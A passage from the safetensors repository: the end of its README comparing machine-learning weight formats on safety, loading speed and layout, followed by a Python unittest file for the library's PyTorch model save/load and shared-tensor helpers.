111 | The main rationale for this crate is to remove the need to use
112 | `pickle` on `PyTorch` which is used by default.
113 | There are other formats out there used by machine learning and more general
114 | formats.
115 |
116 |
117 | Let's take a look at alternatives and why this format is deemed interesting.
118 | This is my very personal and probably biased view:
119 |
120 | | Format | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8
121 | | ----------------------- | --- | --- | --- | --- | --- | --- | --- |
122 | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
123 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ |
124 | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 |
125 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 |
126 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 |
127 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ |
128 | | Arrow | ? | ? | ? | ? | ? | ? | ✗ |
129 | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ |
130 | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 |
131 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 |
132 |
133 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code ?
134 | - Zero-copy: Does reading the file require more memory than the original file ?
135 | - Lazy loading: Can I inspect the file without loading everything ? And loading only
136 | some tensors in it without scanning the whole file (distributed setting) ?
137 | - Layout control: Lazy loading, is not necessarily enough since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important.
138 | - No file size limit: Is there a limit to the file size ?
139 | - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code ? (~ means we can store more than pure tensors, but no custom code)
140 | - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are
141 | necessary)? This is becoming increasingly important in the ML world.
142 |
143 |
144 | ### Main oppositions
145 |
146 | - Pickle: Unsafe, runs arbitrary code
147 | - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise actually. Some classic use after free issues: . On a very different level than pickle security-wise. Also 210k lines of code vs ~400 lines for this lib currently.
148 | - SavedModel: Tensorflow specific (it contains TF graph information).
149 | - MsgPack: No layout control to enable lazy loading (important for loading specific parts in distributed setting)
150 | - Protobuf: Hard 2Go max file size limit
151 | - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize).
152 | - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy.
153 | - Arrow: No `bfloat16` support.
154 |
155 | ### Notes
156 |
157 | - Zero-copy: No format is really zero-copy in ML, it needs to go from disk to RAM/GPU RAM (that takes time). On CPU, if the file is already in cache, then it can
158 | truly be zero-copy, whereas on GPU there is not such disk cache, so a copy is always required
159 | but you can bypass allocating all the tensors on CPU at any given point.
160 | SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but since deserialization is <<< of the time required to load the actual tensor data and is readable I went that way, (also space is <<< to the tensor data).
161 |
162 | - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the
163 | moment.
164 | - Order: 'C' or row-major. This seems to have won. We can add that information later if needed.
165 | - Stride: No striding, all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format.
166 | - Sub 1 bytes dtypes: Dtypes can now have lower than 1 byte size, this makes alignment&adressing tricky. For now, the library will simply error out whenever an operation triggers an non aligned read. Trickier API may be created later for those non standard ops.
167 |
168 | ### Benefits
169 |
170 | Since we can invent a new format we can propose additional benefits:
171 |
172 | - Prevent DOS attacks: We can craft the format in such a way that it's almost
173 | impossible to use malicious files to DOS attack a user. Currently, there's a limit
174 | on the size of the header of 100MB to prevent parsing extremely large JSON.
175 | Also when reading the file, there's a guarantee that addresses in the file
176 | do not overlap in any way, meaning when you're loading a file you should never
177 | exceed the size of the file in memory
178 |
179 | - Faster load: PyTorch seems to be the fastest file to load out in the major
180 | ML formats. However, it does seem to have an extra copy on CPU, which we
181 | can bypass in this lib by using `torch.UntypedStorage.from_file`.
182 | Currently, CPU loading times are extremely fast with this lib compared to pickle.
183 | GPU loading times are as fast or faster than PyTorch equivalent.
184 | Loading first on CPU with memmapping with torch, and then moving all tensors to GPU seems
185 | to be faster too somehow (similar behavior in torch pickle)
186 |
187 | - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to
188 | load only part of the tensors on the various models. For
189 | [BLOOM](https://huggingface.co/bigscience/bloom) using this format enabled
190 | to load the model on 8 GPUs from 10mn with regular PyTorch weights down to 45s.
191 | This really speeds up feedbacks loops when developing on the model. For instance
192 | you don't have to have separate copies of the weights when changing the distribution
193 | strategy (for instance Pipeline Parallelism vs Tensor Parallelism).
194 |
195 | License: Apache-2.0
196 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_pt_model.py:
--------------------------------------------------------------------------------
1 | import copy
2 | import unittest
3 |
4 | import torch
5 |
6 | from safetensors import safe_open
7 | from safetensors.torch import (
8 | _end_ptr,
9 | _find_shared_tensors,
10 | _is_complete,
11 | _remove_duplicate_names,
12 | load_model,
13 | save_file,
14 | save_model,
15 | )
16 |
17 |
18 | class OnesModel(torch.nn.Module):
19 | def __init__(self):
20 | super().__init__()
21 | self.a = torch.nn.Linear(4, 4)
22 | self.a.weight = torch.nn.Parameter(torch.ones((4, 4)))
23 | self.a.bias = torch.nn.Parameter(torch.ones((4,)))
24 | self.b = self.a
25 |
26 |
27 | class Model(torch.nn.Module):
28 | def __init__(self):
29 | super().__init__()
30 | self.a = torch.nn.Linear(100, 100)
31 | self.b = self.a
32 |
33 |
34 | class NonContiguousModel(torch.nn.Module):
35 | def __init__(self):
36 | super().__init__()
37 | self.a = torch.nn.Linear(100, 100)
38 | A = torch.zeros((100, 100))
39 | A = A.transpose(0, 1)
40 | self.a.weight = torch.nn.Parameter(A)
41 |
42 |
43 | class CopyModel(torch.nn.Module):
44 | def __init__(self):
45 | super().__init__()
46 | self.a = torch.nn.Linear(100, 100)
47 | self.b = copy.deepcopy(self.a)
48 |
49 |
50 | class NoSharedModel(torch.nn.Module):
51 | def __init__(self):
52 | super().__init__()
53 | self.a = torch.nn.Linear(100, 100)
54 | self.b = torch.nn.Linear(100, 100)
55 |
56 |
57 | class TorchModelTestCase(unittest.TestCase):
58 | def test_is_complete(self):
59 | A = torch.zeros((3, 3))
60 | self.assertTrue(_is_complete(A))
61 |
62 | B = A[:1, :]
63 | self.assertFalse(_is_complete(B))
64 |
65 | # Covers the whole storage but with holes
66 | C = A[::2, :]
67 | self.assertFalse(_is_complete(C))
68 |
69 | D = torch.zeros((2, 2), device=torch.device("meta"))
70 | self.assertTrue(_is_complete(D))
71 |
72 | def test_find_shared_tensors(self):
73 | A = torch.zeros((3, 3))
74 | B = A[:1, :]
75 |
76 | self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}])
77 | self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}])
78 | self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}])
79 |
80 | C = torch.zeros((2, 2), device=torch.device("meta"))
81 | D = C[:1]
82 | # Meta device is not shared
83 | self.assertEqual(_find_shared_tensors({"C": C, "D": D}), [])
84 | self.assertEqual(_find_shared_tensors({"C": C}), [])
85 | self.assertEqual(_find_shared_tensors({"D": D}), [])
86 |
87 | def test_find_shared_non_shared_tensors(self):
88 | A = torch.zeros((4,))
89 | B = A[:2]
90 | C = A[2:]
91 | # Shared storage but do not overlap
92 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}])
93 |
94 | B = A[:2]
95 | C = A[1:]
96 | # Shared storage but *do* overlap
97 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}])
98 |
99 | B = A[:2]
100 | C = A[2:]
101 | D = A[:1]
102 | # Shared storage but *do* overlap
103 | self.assertEqual(
104 | _find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}]
105 | )
106 |
107 | def test_end_ptr(self):
108 | A = torch.zeros((4,))
109 | start = A.data_ptr()
110 | end = _end_ptr(A)
111 | self.assertEqual(end - start, 16)
112 | B = torch.zeros((16,))
113 | A = B[::4]
114 | start = A.data_ptr()
115 | end = _end_ptr(A)
116 | # Jump 3 times 16 byes (the stride of B)
117 | # Then add the size of the datapoint 4 bytes
118 | self.assertEqual(end - start, 16 * 3 + 4)
119 |
120 | # FLOAT16
121 | A = torch.zeros((4,), dtype=torch.float16)
122 | start = A.data_ptr()
123 | end = _end_ptr(A)
124 | self.assertEqual(end - start, 8)
125 | B = torch.zeros((16,), dtype=torch.float16)
126 | A = B[::4]
127 | start = A.data_ptr()
128 | end = _end_ptr(A)
129 | # Jump 3 times 8 bytes (the stride of B)
130 | # Then add the size of the datapoint 4 bytes
131 | self.assertEqual(end - start, 8 * 3 + 2)
132 |
133 | def test_remove_duplicate_names(self):
134 | A = torch.zeros((3, 3))
135 | B = A[:1, :]
136 |
137 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]})
138 | self.assertEqual(
139 | _remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]}
140 | )
141 | with self.assertRaises(RuntimeError):
142 | self.assertEqual(_remove_duplicate_names({"B": B}), [])
143 |
144 | def test_failure(self):
145 | model = Model()
146 | with self.assertRaises(RuntimeError):
147 | save_file(model.state_dict(), "tmp.safetensors")
148 |
149 | # def test_workaround_refuse(self):
150 | # model = Model()
151 | # A = torch.zeros((1000, 10))
152 | # a = A[:100, :]
153 | # model.a.weight = torch.nn.Parameter(a)
154 | # with self.assertRaises(RuntimeError) as ctx:
155 | # save_model(model, "tmp4.safetensors")
156 | # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception))
157 |
158 | def test_save(self):
159 | # Just testing the actual saved file to make sure we're ok on big endian
160 | model = OnesModel()
161 | save_model(model, "tmp_ones.safetensors")
162 | with safe_open("tmp_ones.safetensors", framework="pt") as f:
163 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
164 |
165 | # 192 hardcoded to skip the header, metadata order is random.
166 | self.assertEqual(
167 | open("tmp_ones.safetensors", "rb").read()[192:],
168 | b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""",
169 | )
170 |
171 | model2 = OnesModel()
172 | load_model(model2, "tmp_ones.safetensors")
173 |
174 | state_dict = model.state_dict()
175 | for k, v in model2.state_dict().items():
176 | torch.testing.assert_close(v, state_dict[k])
177 |
178 | def test_workaround(self):
179 | model = Model()
180 | save_model(model, "tmp.safetensors")
181 | with safe_open("tmp.safetensors", framework="pt") as f:
182 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
183 |
184 | model2 = Model()
185 | load_model(model2, "tmp.safetensors")
186 |
187 | state_dict = model.state_dict()
188 | for k, v in model2.state_dict().items():
189 | torch.testing.assert_close(v, state_dict[k])
190 |
191 | def test_workaround_works_with_different_on_file_names(self):
192 | model = Model()
193 | state_dict = model.state_dict()
194 | state_dict.pop("a.weight")
195 | state_dict.pop("a.bias")
196 | save_file(state_dict, "tmp.safetensors")
197 |
198 | model2 = Model()
199 | load_model(model2, "tmp.safetensors")
200 |
201 | state_dict = model.state_dict()
202 | for k, v in model2.state_dict().items():
203 | torch.testing.assert_close(v, state_dict[k])
204 |
205 | def test_workaround_non_contiguous(self):
206 | model = NonContiguousModel()
207 |
208 | with self.assertRaises(ValueError) as ctx:
209 | save_model(model, "tmp_c.safetensors", force_contiguous=False)
210 | self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception))
211 | save_model(model, "tmp_c.safetensors", force_contiguous=True)
212 |
213 | model2 = NonContiguousModel()
214 | load_model(model2, "tmp_c.safetensors")
215 |
216 | state_dict = model.state_dict()
217 | for k, v in model2.state_dict().items():
218 | torch.testing.assert_close(v, state_dict[k])
219 |
220 | def test_workaround_copy(self):
221 | model = CopyModel()
222 | self.assertEqual(
223 | _find_shared_tensors(model.state_dict()),
224 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}],
225 | )
226 | save_model(model, "tmp.safetensors")
227 |
228 | model2 = CopyModel()
229 | load_model(model2, "tmp.safetensors")
230 |
231 | state_dict = model.state_dict()
232 | for k, v in model2.state_dict().items():
233 | torch.testing.assert_close(v, state_dict[k])
234 |
235 | def test_difference_with_torch(self):
236 | model = Model()
237 | torch.save(model.state_dict(), "tmp2.bin")
238 |
239 | model2 = NoSharedModel()
240 | # This passes on torch.
241 | # The tensors are shared on disk, they are *not* shared within the model
242 | # The model happily loads the tensors, and ends up *not* sharing the tensors by.
243 | # doing copies
244 | self.assertEqual(
245 | _find_shared_tensors(model2.state_dict()),
246 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}],
247 | )
248 | model2.load_state_dict(torch.load("tmp2.bin"))
249 | self.assertEqual(
250 | _find_shared_tensors(model2.state_dict()),
251 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}],
252 | )
253 |
254 | # However safetensors cannot save those, so we cannot
255 | # reload the saved file with the different model
256 | save_model(model, "tmp2.safetensors")
257 | with self.assertRaises(RuntimeError) as ctx:
258 | load_model(model2, "tmp2.safetensors")
259 | self.assertIn(
260 | """Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception)
261 | )
262 |
263 | def test_difference_torch_odd(self):
264 | model = NoSharedModel()
265 | a = model.a.weight
266 | b = model.b.weight
267 | self.assertNotEqual(a.data_ptr(), b.data_ptr())
268 | torch.save(model.state_dict(), "tmp3.bin")
269 |
270 | model2 = Model()
271 | self.assertEqual(
272 | _find_shared_tensors(model2.state_dict()),
273 | [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}],
274 | )
275 | # Torch will affect either `b` or `a` to the shared tensor in the `model2`
276 | model2.load_state_dict(torch.load("tmp3.bin"))
277 |
278 | # XXX: model2 uses only the B weight not the A weight anymore.
279 | self.assertFalse(torch.allclose(model2.a.weight, model.a.weight))
280 | torch.testing.assert_close(model2.a.weight, model.b.weight)
281 | self.assertEqual(
282 | _find_shared_tensors(model2.state_dict()),
283 | [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}],
284 | )
285 |
286 | # Everything is saved as-is
287 | save_model(model, "tmp3.safetensors")
288 | # safetensors will yell that there were 2 tensors on disk, while
289 | # the models expects only 1 tensor since both are shared.
290 | with self.assertRaises(RuntimeError) as ctx:
291 | load_model(model2, "tmp3.safetensors")
292 | # Safetensors properly warns the user that some ke
293 | self.assertIn(
294 | """Unexpected key(s) in state_dict: "b.bias", "b.weight""",
295 | str(ctx.exception),
296 | )
297 |
--------------------------------------------------------------------------------